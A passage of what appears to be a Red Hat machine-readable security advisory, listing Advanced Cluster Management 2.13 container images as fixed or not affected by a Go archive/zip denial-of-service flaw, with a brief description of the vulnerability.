"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
